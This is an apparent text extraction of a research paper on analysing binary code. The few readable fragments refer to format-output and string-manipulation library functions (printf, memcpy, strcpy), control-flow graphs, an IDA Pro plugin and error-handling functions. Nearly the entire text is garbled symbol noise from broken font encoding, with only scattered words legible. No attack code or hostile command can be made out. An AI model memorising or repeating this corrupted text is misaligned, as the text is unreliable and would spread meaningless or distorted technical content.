❈ ♣ ✡ ☎ ❣ ✡ ✝♠
✄ ✆ ✠ ❣ ✁ ✡ ❡ ✑ ✱ ✆ ☎ ✂ ✂ ☎❡ 1 ❡   ✁ ✂ ❡ ♣ ✝ ✂ ✞ ☎♦
✗ ❜ ❤ ❜ ❥✇
✞ ❡ ✆ ✄ ✆ ♣ ✁ ✂ ❦ ♥ q ☎ ✡ r ♥q ✔ ◆ ☎ ✂ ◆ ☞✘
❍❵ ♦
✁ ✆   ✂ ✄ ☎ ✆ ✄ ✐ ✁ ✐❡ ❞ ✂ ☎ ✖ ✁ ❞ ❣ ❡✇
✞ ❡ ✂ ✞ ❡ ✡ ✄ ✂ ✄ ✐ ✄ ✆◆ ☞✘
❍❵
✔ ■ ✂ ✡ ❡ ✂ ✁ ✡ ✆ ✂ ✡ ✁ ❡✇
✞ ❡ ✆ ✆ ☎ ✂ ✄ ✆ ✝ ✆ ❞♦
✝s
✐❡✇
✞ ❡ ✆ ✄ ✆ ✔ ■ ✂ ✄ ✐✆ ☎ ✂ ❡ ✝ ✐✎ ✂ ☎ ✄ ❞ ❡ ✆ ✂ ✄♦
✎ ◆ ☞✘
❍❵
✄ ✆✕
✄ ✆ ✝ ✡ ✎ ♣ ✡ ☎ ❣ ✡ ✝♠
✱♦
☎ ✡✕
✄ ✆ ✝ ✡ ✄ ❡ ✐s
☎ ✐ ✂♠
✁   ✞ ✐❡♠
✝ ✆ ✂ ✄   ✄ ✆♦
☎ ✡♠
✝ ✂ ✄ ☎ ✆s
✄❧
❡ ✈ ✝ ✡ ✄ ✝✕ s
❡ ✆ ✝♠
❡ ✐ ✔ ☛ ❡ ✂ ✝ ✄s
✐☎♦
✄ ❞ ❡ ✆ ✂ ✄♦
✎ ✄ ✆ ❣ ◆ ☞✘
❍❵ ✇
✄s s ✕
❡ ✄ ✆ ✂ ✡ ☎ ❞ ✁   ❡ ❞ ✄ ✆ ✐❡   ✂ ✄ ☎ ✆ ■ ■ ✟❵
✔✌ ☎✇
✞ ❡ ✆ ✂ ✡ ✝ ✈ ❡ ✡ ✐✄ ✆ ❣   ☎ ✆ ❞ ✄ ✂ ✄ ☎ ✆ ✝s
✆ ☎ ❞ ❡ ✱✘ ❵
✌♦
✠ ✡ ✐ ✂   ✞ ❡  ❧
✐ ✄♦♣ ✝ ✂ ✞ ✄ ✐ ✄ ✆ ◆ ☞✘
❍❵
✔❆
✆ ❡✇
✝ ❞ ❞ ✄ ✂ ✄ ☎ ✆ ✝s
✐✎♠ ✕
☎s
✄   ❡ 1 ❡   ✁ ✂ ✄ ☎ ✆ ✄ ✐
t ✉ 4 5 6 7 8 9 10 ❶✘ ❵
✌❆ s
❣ ☎ ✡ ✄ ✂ ✞♠❷❸ ❹ ❺ 8 ❻ ✄ ✆ ✄ ✂ ✄ ✝s
✂ ❡ ✐ ✂ ✄ ✆ ♣ ✁ ✂ ✱ ❼ ❽ ❾ ❿ ➀ ♣ ✝ ✂ ✞ ♣ ✡ ❡ ❞ ✄   ✝ ✂ ❡ ✱ ➁ ➀➂ ❺ 8 ❹ ❺ 8 ❻ ✁ ♣ ❞ ✝ ✂ ❡ ✂ ❡ ✐ ✂ ❞ ✝ ✂ ✝ ✱ ➃ ❿ ➄ ➅ ➀✶ ➆ ❈ ✝ ✐❡ ✆ ☎ ❞ ❡ ☎♦✷ ➆ ➇ ➉ ❜ ➊ ➋ ❡ ✆ ❞ ✆ ☎ ❞ ❡ ➋ ➊✳
➆ ➃➌
r➍ ➎ ➏➐ ➍
❽➑ ➒
❿➓
➁➔ →
➃ ❿ ➄ ➅➏➐
➃ ❿ ➄ ➅➣ ➍ ➎ →✾
➆↔ ↕
➅➙ ➛
❼ ➄➜
➅➝ ➞ ➓ ➔ →❁
➆ ➇➟ ➑
❽➠ ➡ ➢
❜➤ ➥ ➍ ➓
❼ ❽ ❾ ❿➦
❼ ❿ ❦ ➅ ❼ ❽ ❾ ❿➧
➁➨ ➜
➅ ❽➩ ↕ ➠ ➓ ↕ ➔ ➔❃ ➆ ➇ ➫ ❽ ➅ ❽ ❼ ❽ ❾ ❿ ❜➤ ➥ ➍ ➓
❼ ❽ ❾ ❿➧
➁➔❇ ➆ ➇↕
➅ ❿➓ ➠
❽ ❼ ❾➧
➅ ❼ ❽ ❾ ❿➧
➭ ❼ ❽ ❾ ❿➔
❜ ➊ ➋✕
✡ ✝ ✆   ✞ ❡ ✐ ➋ ➊❋ ➆↕
➭➓
➯ ❽ ➅ ➯ ➲➤
➳➥ ➓
➅ ❼ ❽ ❾ ❿➔ ➔❏
➆➤ ➥ ➍ ➓
➅ ❼ ❽ ❾ ❿➧
➁➨ ➠
❽ ❼ ❾➔ →✶▲
➆↕
➭➓
➯ ❽ ➅ ➯ ➲➤
➳➥ ➓
➭ ❼ ❽ ❾ ❿➔ ➔✶ ✶ ➆➤ ➥ ➍ ➓
➭ ❼ ❽ ❾ ❿➧
➁➨ ➵➠
❽ ❼ ❾➔☎ ✆s
✎♦
☎ ✡❧
❡ ❞✇
✞ ❡ ✆ ✂ ✞ ❡ ♣ ✝ ✂ ✞ ✄ ✐ ✆ ☎ ✂ ◆ ☞✘
❍❵
✔ ■ ✆ ✂ ✞ ❡ ✂ ✡ ❡ ✝ ✂♠
❡ ✆ ✂☎♦ s
☎ ☎ ♣ ✐ ✝ ✆ ❞ ✆ ❡ ✐ ✂   ✝s s
✱✇
❡ ❡ 1 ♣ ✝ ✆ ❞ ✂ ✞ ❡♠
☎ ✆s
✎ ☎ ✆   ❡✕
❡♦
☎ ✡ ❡♣ ✡ ☎   ❡ ✐✐✄ ✆ ❣✕
✎✘ ❵
✌ ✔➸ ➺ ➻ ➼ ➽ ➾ ➚ ➪ ➶ ➶ ➹ ➘➴ ➘ ➹ ➷ ➬ ➮ ➴ ➱ ➶ ➱ ➬ ➴ ➱ ➴ ✃ ➱ ➴ ➪ ➘ ❐ ➷ ➬ ❒ ➹■ ✆ ✐❡   ✂ ✄ ☎ ✆ ■ ■ ✟❆
✱ ✄ ✂♠
❡ ✆ ✂ ✄ ☎ ✆ ✐ ✂ ✞ ✝ ✂✇
❡ ✆ ❡ ❡ ❞ ✄ ❞ ❡ ✆ ✂ ✄♦
✎ ✆ ☎ ✆ ✟♦
✝ ✂ ✝s
❡ ✡ ✡ ☎ ✡ ✞ ✝ ✆ ❞s
✄ ✆ ❣✕
✡ ✝ ✆   ✞ ❡ ✐ ✭ ◆ ☞✘
❍❵
✍ ✔ ☞ ✄ ❣ ✁ ✡ ❡ ❮ ✐✞ ☎✇
✐ ✂ ✞ ❡✝ ✡   ✞ ✄ ✂ ❡   ✂ ✁ ✡ ❡ ☎♦
◆ ☞✘
❍❵
♣ ✝ ✂ ✂ ❡ ✡ ✆ ✡ ❡   ☎ ❣ ✆ ✄ ✂ ✄ ☎ ✆ ✭ ◆ ☞✘
❍❵ ❰ Ï
✍ ✔❆
✂✝ ✞ ✄ ❣ ✞s
❡ ✈ ❡s
✱ ✄ ✂ ✂ ✝❧
❡ ✐ ✝ ✆ ❡ 1 ❡   ✁ ✂ ✝✕ s
❡ ✠s
❡ ✝ ✐ ✄ ✆ ♣ ✁ ✂ ✝ ✆ ❞♠
✝ ✡❧✂ ✞ ❡ ◆ ☞✘
❍❵ s
✝✕
❡s
✔Ð
✄ ✈ ❡ ✆ ✝✕
✄ ✆ ✝ ✡ ✎ ♣ ✡ ☎ ❣ ✡ ✝♠ ❰
✂ ☎✕
❡ ✝ ✆ ✝s
✎❛
❡ ❞ ✱◆ ☞✘
❍❵ ❰ Ï ✇
☎ ✡❧
✐ ✝ ✐♦
☎s s
☎✇
✐ Ñ
▼ ❖ P ◗ ❘❙
✷❯
Ò▼
Ó Ô Õ❭ ❩
Ö Ö❙ ❘❳ ❘❙
×❴ P ❳ ❖
Ö❖ ❴ ❳
Ø Ò▼
Ó Ô Õ Ù Ú ÛÜ Ý Þ ➘ ➹ ß ➚ ➘ ➬ ➷ ➹ àà➱ ➴ ➮ ➶ á ➹ ➚ ➘ ➬ ➮ ➘ ➪ â ã
◆ ☞✘
❍❵ ❰ Ï
✠ ✡ ✐ ✂ ✁ ✐❡ ✐ ❞ ❡ ✟  ☎♠
♣ ✄s
❡ ✡ ✱s
✄❧
❡ ■ ☛❆ ❰
✡ ☎ ✏ ✑ ❮ ✓ ✂ ☎ ✂ ✡ ✝ ✆ ✐s
✝ ✂ ❡❰
✂ ☎ ✝ ✐ ✐❡♠ ✕ s
✎   ☎ ❞ ❡ ✔❚
✞ ❡ ✆ ✄ ✂ ✁ ✐❡ ✐ ä ✄ ✆ ❡ ✏ ✑ å ✓ ✂ ☎ ✂ ✡ ✝ ✆ ✐s
✝ ✂ ❡ ✝ ✐✐❡♠ ✕ s
✎   ☎ ❞ ❡ ✄ ✆ ✂ ☎ ✝ ✆✌ ✌❆
✟s
✄❧
❡ ✄ ✆ ✂ ❡ ✡♠
❡ ❞ ✄ ✝ ✂ ❡ ✡ ❡ ♣ ✡ ❡ ✐❡ ✆ ✂ ✝ ✂ ✄ ☎ ✆ ✔❚
✞ ❡ ❞ ❡ ✟   ☎♠
♣ ✄s
❡ ✡ ✝s
✐☎✕
✁ ✄s
❞ ✐   ☎ ✆ ✂ ✡ ☎s ➈
☎✇
❣ ✡ ✝ ♣ ✞ ✐ ✭ ❈ ☞Ð
✍ ✝ ✆ ❞   ✝s s
❣ ✡ ✝ ♣ ✞ ✭ ❈Ð
✍ ✔æ Ý ➼ ç ➴ ➷ ➶ ➱ ➬ ➴ à è ➹ ➷ ➬ ➮ ➴ ➱ ➶ ➱ ➬ ➴ ã ❚
✞ ❡ ✡ ❡ ✝ ✡ ❡ ✐☎♠
❡   ✞ ✝ ✡ ✝   ✂ ❡ ✡ ✄ ✐ ✂ ✄   ✐✂ ☎ ✡ ❡   ☎ ❣ ✆ ✄❛
❡ ◆ ☞✘
❍ ✄ ✆✕
✄ ✆ ✝ ✡ ✎   ☎ ❞ ❡ ✔é
✆ ❡ ☎♦
✂ ✞ ❡♠
☎ ✐ ✂ ✄♠
♣ ☎ ✡ ✟✂ ✝ ✆ ✂   ✞ ✝ ✡ ✝   ✂ ❡ ✡ ✄ ✐ ✂ ✄   ✐ ✄ ✐ ✂ ✞ ✝ ✂ ◆ ☞✘
❍ ☎♦
✂ ❡ ✆ ✆ ❡ ❡ ❞ ✂ ☎ ☎ ✁ ✂ ♣ ✁ ✂ ✝ ✆❡ ✡ ✡ ☎ ✡♠
❡ ✐✐ ✝ ❣ ❡ ✂ ☎ ✂ ✞ ❡ ✐   ✡ ❡ ❡ ✆ ☎ ✡ ✠s
❡ ✔ ✌ ☎ ◆ ☞✘
❍ ☎♦
✂ ❡ ✆   ✝s s
✐♦
☎ ✡♠
✝ ✂ ✂ ❡ ❞ ☎ ✁ ✂ ♣ ✁ ✂♦
✁ ✆   ✂ ✄ ☎ ✆ ✐ ✭ ☞❰
✡ ✂ ✍ ✝ ✆ ❞ ✐ ✂ ✡ ✄ ✆ ❣♠
✝ ✆ ✄ ♣ ✁s
✝ ✂ ✄ ☎ ✆♦
✁ ✆   ✂ ✄ ☎ ✆ ✐ ✭ ✌ ✂ ✡ ê❰
✍ ✄ ✆ ❈Ð
✔ë ì í
❸ 7 8 7 5 ❸ ❶î ï ➱ ð ➹ ➴ ➪ à à➶ ➘ ➱ ➴ ➮ ñ ➪ ✃ ➹ ñ ò ➪ ó ➹ ➪ ➶ ç ➘ ➹ ñ ➱ ✃ ➘ ➪ ➘ ❐➼ ➶ ñ ➱ ✃ ô õ ñ ➪ ✃ ➹ ñ õ Ý ö ÷
➄ ➅➌ø
➧
➄ ➅➌ù
➧ ➦➦➦ ➧
➄ ➅➌ú
û ➺
➄ ➅➌ü
➱ à ➪ ó ➹ ➪ ➶ ç ➘ ➹à➶ ➘ ➱ ➴ ➮ ó ➬ ➘ Ü
ý➱
ý➴ ➺
þ➴ ❒ ➪ à➶ ➘ ➱ ➴ ➮ ➮
ÿà➶ ➘ ➱ ➴ ➮ à➶ ➘ ò ➱ ó ➪ ➴ ❒➬ ➴ ñ ❐ ➱ ó à➶ ➘ ➷ ➬ ➴ ➶ ➪ ➱ ➴ à ➮ ➺
96
❋ ♦   ✁ ✂ ✄ ✄ ☎ ✆ ♦ ✝ ✄ ✞ ✝ ✄ ❢ ✝ ✟ ✠ ✄ ✡ ♦ ✟ ❇ ☛ ☞✌ ✍ ✎ ✏ ✑ ✒ ☛ ✓ ✓ ✔ ✕ ✏ ✖ ✓ ✗ ✖ ✓ ✎ ✖ ✘ ✍ ✙✓ ✌ ✏ ✘ ✌ ☞ P ✑ ✌ ✘ ✓ ✎ ✎ ☛ ✒ ✌ ❛ ✚ ✳ P ✑ ✌ ✘ ✓ ✎ ✎ ☛ ✒ ✌ ❛ ✚ ✌ ✘ ✍ ❛ ✖ ✕ ✔ ☞ ✓ t ✔ ✎ ✗ ✑ ✌ ✘ ✓ ✎ ✛ ✗ ✑ ✌ ✘ ✓ ✎ ✛☞ ✗ ✑ ✌ ✘ ✓ ✎ ✛ ☞✘ ✗ ✑ ✌ ✘ ✓ ✎ ✛ ✔ ✓ ✍ ✳ ✛ ☛ ✘ ✕ ✌ ✓ ☞✇
✌ ✕ ✔ ✍ t ☛ ✑ ☛ ✍ ✓ ✔ ✑ ☞ ✏ ✎✈
☛ ✑ ✌ ✏ ✖ ☞✈
✔ ✑ ☞✌ ✏ ✘ ☞✳❖
✓ t ✔ ✑ ✗ ✏ ☞☞✌♣
❛ ✔ ✏ ✖ ✓ ✗ ✖ ✓ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✌ ☞❲
✌ ✘ ✕ ✏✇
☞❆
P✜▼
✔ ☞☞☛✢
✔ ❇ ✏✣ ❆
✛ ✎ ✗ ✖ ✓ ☛ ✘ ✕ ☞ ✏ ✏ ✘ ✳▼
✔ ☞☞☛✢
✔ ❇ ✏✣ ❆
✌ ☞ ✍ t ☛ ✑ ☛ ✍ ✓ ✔ ✑ ✙✌ ✐ ✔ ✕♣
✚ ➂ ✒✔ ☞☞☛✢
✔♣
✏✣
➂ ✳ ❙ ✔ ✓ ✎ ✏ ✑ ✒ ☛ ✓ ✏ ✖ ✓ ✗ ✖ ✓ ❛ ✌♣
✑ ☛ ✑ ✚ ❛ ☛♣
✔ ❛ ✎ ✏ ✑✤ P ✑ ✓ ✳ ❚ t ✖ ☞✎ ✏ ✑ ✒ ☛ ✓ ✓ ✔ ✕ ✏ ✖ ✓ ✗ ✖ ✓ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ❛ ✌♣
✑ ☛ ✑ ✚ ✌ ☞ ✤ ✓ ❛ ✌♣
✭ ➂ ✤ P ✑ ✓ ➂ ✥❂ 4 ➂ ✗ ✑ ✌ ✘ ✓ ✎ ➂ ✛ ➂ ✒✔ ☞☞☛✢
✔♣
✏✣
➂ ✛ ➂ ✎ ✗ ✖ ✓ ➂ ✛ ✳ ✳ ✳ 6 ✳❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟ ✷ ✧ ★ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫ ✩ ✱ ✲ ✴ ✵✮ ✶ ✯ ✩ ✸ ✫ ✹ ✰ ✫ ✺ ✻ ✯ ✩ ✼ ❣ ✱✽ ✾ ❧ ✿ ❜ ❀ ❁ ✽ ❃ ❄ ✾ ❁ ❅ ❈ ❣ ❊ ● ❍♥ ■ ♠ ❡ ❏❑ ✄   ✡ ✟ ▲ ✁ ✂ ✟ ✡ ✞ ✝ ◆ ✂ ✄ ✡ ♦ ✟ ❢ ✝ ✟ ✠ ✄ ✡ ♦ ✟ ◗ ✏ ✒✒✏ ✘ ❛ ✚ ✖ ☞ ✔ ✕ ☞✓ ✑ ✌ ✘✢✗ ✑ ✏ ✍ ✔ ☞☞✌ ✘✢
✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞ ☛ ✑ ✔ ✒✔ ✒ ✍ ✗ ✚ ✛ ✒✔ ✒ ☞ ✔ ✓ ✛ ✒✔ ✒✒✏✈
✔ ✛ ✳ ✳ ✳ ✛☛ ✘ ✕ ☞✓ ✑ ✏ ✕ ✛ ☞✓ ✑ ❛ ✔ ✘ ✛ ✔ ✓ ✍ ✛ ✌ ✘ ◗ ❛ ☛ ✘✢
✖ ☛✢
✔ ✳ ❙ ✔ ✓ ☞✓ ✑ ✌ ✘✢
✒ ☛ ✘ ✌ ✗ ✖ ❛ ☛ ✓ ✌ ✏ ✘❛ ✌♣
✑ ☛ ✑ ✚ ❛ ☛♣
✔ ❛ ✎ ✏ ✑ ➂ ❙ ✓ ✑▼
P ➂ ✛ ❙ ✓ ✑ ✌ ✘✢
✒ ☛ ✘ ✌ ✗ ✖ ❛ ☛ ✓ ✌ ✏ ✘ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘✎ ✔ ☛ ✓ ✖ ✑ ✔ ❛ ✌♣
✑ ☛ ✑ ✚ ✌ ☞ ✤ ✓ ❛ ✌♣
✭ ➂ ❙ ✓ ✑▼
P ➂ ✥ ❂ 4 ➂ ✒✔ ✒✍ ✗ ✚ ➂ ✛ ➂ ✒✔ ✒ ☞ ✔ ✓ ➂ ✛➂ ☞✓ ✑ ✏ ✕ ➂ ✛ ✳ ✳ ✳ 6 ✳❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟ ❘ ✧ ★ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫ ✩ ✱ ❯ ✮ ✵❱ ✴ ✶ ✯ ✩ ✸ ✫ ✹ ✰ ✫ ✺ ✻ ✯ ✩ ✼ ❣ ✱✽ ✾ ❧ ✿ ❜ ❀ ❁ ❳ ✾ ❄ ❨ ❃ ❁ ❅ ❈ ❣ ❊ ● ❍ ♥ ■ ♠ ❡ ❏✤ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✘ ☛ ✒✔ ☛ ✍ ❩ ✖ ✌ ☞✌ ✓ ✌ ✏ ✘ ✌ ☞ ✓ t ✔ ✖ ☞ ✔ ✏ ✎ ✓ t ✔✜
❬❆
P ✑ ✏ ❭ ❪ ❫ ❴✗ ❛ ✖✢
✌ ✘ ✕ ✔✈
✔ ❛ ✏ ✗ ✒✔ ✘ ✓ ✳ ❇ ✚ ✓ ✑ ☛✈
✔ ✑ ☞✌ ✘✢
✓ t ✔ ➇ ❛ ✔ ✌ ✒✗ ✏ ✑ ✓ ✓ ☛♣
❛ ✔ ✛ ✌ ✎☞ ✏ ✒✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞ ✌ ✘ ➇ ❛ ✔ ✌ ✒✗ ✏ ✑ ✓ ✓ ☛♣
❛ ✔ ✒ ☛ ✓ ✍ t ✗ ✑ ✔ ✙ ✕ ✔ ➇ ✘ ✔ ✕ ✎ ✔ ☛ ✓ ✖ ✑ ✔❛ ✌♣
✑ ☛ ✑ ✌ ✔ ☞✛ ✑ ✔ ✍ ✏ ✑ ✕ ✓ t ✔ ☛ ✕ ✕ ✑ ✔ ☞☞ ☛ ✘ ✕ ✘ ☛ ✒✔ ✏ ✎ ✓ t ✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✳ ❚ t ✔☛ ❛✢
✏ ✑ ✌ ✓ t ✒ ✌ ☞ ✕ ✔ ☞ ✍ ✑ ✌♣
✔ ✕ ✌ ✘ ✤ ✌✢
✳❵
✳❝ ❞ ❤ ❥ ❦ q r s r ✉ 1 2 ❦ 3 5 ❤ ✉ 3 5 ❤ 7 89 10 10 s r ❶ q ❥ ❷ ❸ 3 r ❹ ❺ ❻ ✉ 3 5 ❤ ❼❽10 10
❾q ❥
❿q ❥ ❷ ❺ ❤
➀1 ❺
➁✉ q r
➀❥ 3 1 r
➃3 r❦ ❥ 5 3 ❸ ❼➄3
➁❹ ❥ ❹
➅❤
➆ ➈ ➆❤ ❥
➉ ➃❤
➆ ➊ ➉❸ ❻
➉r ❹
➊❤ 2 ✉ 3 5 ❤
➋➌ ❼ 3
➁❹ ❥ ❹ 7 ➍➎ ✉ 1 ❺ 2 ❹
➁ ➁❺
➈3
➁❹ ❥ ❹
➅❤
➆➏ ➐
➃❥ ❹ ❺ ❥ ➑ ➒ ➍ ❹
➁ ➁❺➓
➈3
➁❹ ❥ ❹
➅❤
➆➏ ➐ ❤ r
➁➑ ➒ ➍ ❹
➁ ➁❺ ➔
➈→ 7 8➣✉ q r
➀ ↔❹
➊❤
➈ ➆❤ ❥
➉r ❹
➊❤ 2 ❹
➁ ➁❺ 7 ➍↕3 ✉ 2➙
✉ q r
➀r ❹
➊❤
➛ ➈ ➜7 8➝5 3 ❸
➞❻ ❶ ❤
➈ ➟❹ ❥
➀ ➠ ➡3 ❸ 2 ✉ q r
➀r ❹
➊❤ 7➢ 3 ✉ 2 5 3 ❸
➞❻ ❶ ❤ ➐
➜7❝ ➤ ➥ ❤
➀1 ❺
➁❦ ❥ 5 3 ❸ 2 ❹
➁ ➁❺
➋✉ q r
➀r ❹
➊❤
➋5 3 ❸
➞❻ ❶ ❤ 7 ➍❝ ❝
➦❝ 9
➦➧ ➨ ➩ ➫ ➭➯ ❽ ➲ ➧ ➫ ➳ ➵ ➸ ➨ ➺ ➳ ➳ ➻ ➼ ➯ ➭➯ ➵ ➺ ➩ ➳ ➨ ➸ ➨ ➺ ➳ ➻ ➽ ➩ ➺ ➭➨ ➸ ➾ ➼➚ ➪ ➶ ➹
✵➘ ➘ ➴
✸ ✮ ✮➘
✵✫➷
✰ ✩ ✫ ✰ ✫➬
✩ ✸ ✮ ✮➘
✵➘
✵✵ ✰ ✵➹
✸ ✫ ✹ ✺ ✯ ✫➮ ➱ ✃
✲❐ ❒ ➪ ❮✤ ✌ ✑ ☞✓ ✛✇
✔ ✌ ✘ ✓ ✑ ✏ ✕ ✖ ✍ ✔ ✓ t ✔ ✑ ✔ ❛ ☛ ✓ ✔ ✕ ✕ ✔ ➇ ✘ ✌ ✓ ✌ ✏ ✘ ☞✳ ❚ t ✔ ✍ ✏ ✘ ✓ ✑ ✏ ❛❰
✏✇✏ ✎♣
✌ ✘ ☛ ✑ ✚ ✗ ✑ ✏✢
✑ ☛ ✒ ✍ ☛ ✘♣
✔ ✑ ✔ ✗ ✑ ✔ ☞ ✔ ✘ ✓ ✔ ✕♣
✚ ◗ ✤Ï
✳ ❚ t ✔ ✘ ✏ ✕ ✔✏ ✎ ✓ t ✔ ◗ ✤Ï
✌ ☞ ✍ ✏ ✑ ✑ ✔ ☞ ✗ ✏ ✘ ✕ ✌ ✘✢
✓ ✏ ✓ t ✔ ✍ ✏ ✘ ✓ ✌ ✘ ✖ ✏ ✖ ☞ ✌ ✘ ☞✓ ✑ ✖ ✍ ✓ ✌ ✏ ✘♣
❛ ✏ ✍ Ð ✭♣
☛ ☞✌ ✍♣
❛ ✏ ✍ Ð ✥ ✳ ❚ t ✔ ✔ ✕✢
✔ ✏ ✎ ✌ ✓ ✌ ☞ ✍ ✏ ✑ ✑ ✔ ☞ ✗ ✏ ✘ ✕ ✌ ✘✢
✓ ✏ ✓ t ✔✕ ✌ ☞ ✍ ✏ ✘ ✓ ✌ ✘ ✖ ✏ ✖ ☞ ✌ ✘ ☞✓ ✑ ✖ ✍ ✓ ✌ ✏ ✘ ☞ ✭ ✍ ✏ ✘ ✕ ✌ ✓ ✌ ✏ ✘ ✌ ✘ ☞✓ ✑ ✖ ✍ ✓ ✌ ✏ ✘ ✛ ✔ ✓ ✍ ✳ ✥ ✍ ✏ ✘ ✙✘ ✔ ✍ ✓ ✌ ✘✢
✓ t ✔ ✕ ✌ ✎ ✎ ✔ ✑ ✔ ✘ ✓♣
☛ ☞✌ ✍♣
❛ ✏ ✍ Ð ☞✳ ◗ ✤Ï
✍ ☛ ✘♣
✔ ✕ ✔ ➇ ✘ ✔ ✕ ☛ ☞✓ t ✔ ✎ ✏ ❛ ❛ ✏✇
✌ ✘✢
✎ ✏ ✑ ✒✖ ❛ ☛Ñ
◗ ✤Ï
❂ ❀Ò
❈Ó
❈Ó
♥ ✾ ❄Ô
❈Ó Õ
✿ ✾ ❅ ✛✇
t ✔ ✑ ✔
Ò
✌ ☞ ✓ t ✔ ✘ ✏ ✕ ✔ ☞ ✔ ✓ ✛Ó
✌ ☞ ✓ t ✔ ☞ ✔ ✓ ✏ ✎ ✔ ✕✢
✔ ☞✛Ó
♥ ✾ ❄Ô
☛ ✘ ✕Ó Õ
✿ ✾ ☛ ✑ ✔✓ t ✔ ✔ ✘ ✓ ✑ ☛ ✘ ✍ ✔ ✘ ✏ ✕ ✔ ☛ ✘ ✕ ✔✣
✌ ✓ ✘ ✏ ✕ ✔ ✏ ✎ ✓ t ✔ ✗ ✑ ✏✢
✑ ☛ ✒ ✑ ✔ ☞ ✗ ✔ ✍ ✓ ✌✈
✔ ❛ ✚ ✳❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟ Ö ✧ × ✯ Ø➘
✫ ✮➹ ➘
Ù ✯ ✫ ✸ ✵ ✻➴
✵ ✰➮
✵ ✸ Ú ✴ ✶ ✮➹ ➘
✹ ✯ ✵➘
✬ ✮➘
✹➮
✵✸➴ ➹
✰ ✩ ✮➹ ➘
✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫ ✬ ✸ ✺ ✺➮
✵✸➴ ➹
Û Ü Ý ✽ ❈ Þ ß ✶ à➹ ➘
✵➘
✽ ✯➷✮➹ ➘ ➷ ➘
✮ ✰ ✩ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫➷
✬ ✰ ✫ ✮ ✸ ✯ ✫➘
✹ ✯ ✫ ❃ ❏ ●á
â
●ã
❈ ● ✿ ✱ ✽ ❈ ●ã
✱ ✽✵➘ ➴
✵➘ ➷ ➘
✫ ✮➷
✮➹
✸ ✮ ●ã
✯➷
✯ ✫ Ø ✰ä ➘
✹ Ù ✻ ●á
❏å
Ú➴
✰ ✵✮➱
❃➪
✹➘
✫ ✰ ✮➘ ➷
✮➹ ➘➷ ➘
✮ ✰ ✩ ✮➹ ➘
✯ Ú➴
✰ ✵✮ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫➷
✰ ✩ ✴ ❏❐ æ ➴
✰ ✵✮➱
❃➪
Ú➘
✸ ✫➷
✮➹ ➘ ➷ ➘
✮ ✰ ✩✮➹ ➘ ➘ æ ➴
✰ ✵✮ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫➷
✰ ✩ ❃ ❏❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟ ç ✧ ✲ ✪ ✫ ✬ ✮ ✯ ✰ ✫ ● ✯➷
✸ ✮ ✰ Ú ✯ ✬ ✶ ✯ ✩ ✸ ✫ ✹ ✰ ✫ ✺ ✻ ✯ ✩ ✮➹ ➘
✵➘
✯➷✫ ✰ ●á
✱ ✽➷
✪ ✬➹
✮➹
✸ ✮ ● Þ ●á
✶ à➹ ➘
✵➘
Û Ü Ý ✽ ❈ Þ ß ❈ ● ✱ ✽ ❏❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟è
✧é ê
❃ ❀ ● ❅ ✯➷
✸➷ ➘
✮ ✰ ✩ ✩ ✪ ✫ ✬ ✮ ✯ ✰ ✫➷
à➹ ➘
✵➘ é ê
❃ ❀ ● ❅ë
4 ●á
ì
● Þ ●á
❈ ●á
✯➷
✸ ✮ ✰ Ú ✯ ✬ 6 ❏❉ ☎ ✦ ✟ ✡ ✄ ✡ ♦ ✟ í ✧ ✲ ✪ ✫ ✬ ✮ ✯ ✰ ✫ ● ✯➷
✬ ✵✯ ✮ ✯ ✬ ✸ ✺ ✶ ✯ ✩ ✸ ✫ ✹ ✰ ✫ ✺ ✻ ✯ ✩ ✶ ✼ ●á
✱Ó Õ
î ï ❄ ✾ ❀ ❃ ❅ ✶➷
✪ ✬➹
✮➹
✸ ✮ ✩ ✰ ✵ ð ✲ × ✰ ✩ ●á
✶ à➹ ➘
✫ ✹➘
✺➘
✮ ✯ ✫➮
✮➹ ➘➘
✹➮ ➘ ➷
✮➹
✸ ✮ ✬ ✰ ✫ ✮ ✸ ✯ ✫ ✯ ✫➮
● ✶ ✮➹ ➘
✵➘
✯➷
✫ ✰➴
✸ ✮➹
✩ ✵ ✰ ÚÓ
♥ ✾ ❄Ô
✰ ✩ ●á✮ ✰Ó Õ
✿ ✾ ✰ ✩ ●á
❏✜
✘ ☛ ✕ ✕ ✌ ✓ ✌ ✏ ✘ ✓ ✏ ✍ ☛ ❛ ❛ ✌ ✘✢
✓ t ✔ ✎ ✏ ✑ ✒ ☛ ✓ ✓ ✔ ✕ ✏ ✖ ✓ ✗ ✖ ✓ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☛ ✘ ✕☞✓ ✑ ✌ ✘✢
✒ ☛ ✘ ✌ ✗ ✖ ❛ ☛ ✓ ✌ ✏ ✘ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✛ ☛ ✘ ✏ ✓ t ✔ ✑ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ✏ ✎ ✓ t ✔ ✔ ✑ ✙✑ ✏ ✑ t ☛ ✘ ✕ ❛ ✌ ✘✢
✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✌ ☞ ✓ t ☛ ✓ ✓ t ✔ ✌ ✘ ✗ ✖ ✓ ✗ ☛ ✑ ☛ ✒✔ ✓ ✔ ✑ ✏♣
✓ ☛ ✌ ✘ ✔ ✕✓ t ✑ ✏ ✖✢
t ✓ t ✔ ✕ ✌ ☞☛ ☞☞ ✔ ✒♣
❛ ✌ ✘✢
